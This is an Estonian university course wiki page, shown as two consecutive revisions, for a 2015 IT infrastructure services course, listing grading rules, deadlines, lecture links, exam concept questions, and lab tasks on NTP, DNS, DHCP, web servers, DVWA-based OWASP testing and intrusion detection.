[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T09:32:15Z

Mernits: /* Teemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

== Teemad 2015 ==

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T09:25:26Z

Mernits: /* Dokumentatsioon */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

== Teemad 2015 ==

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

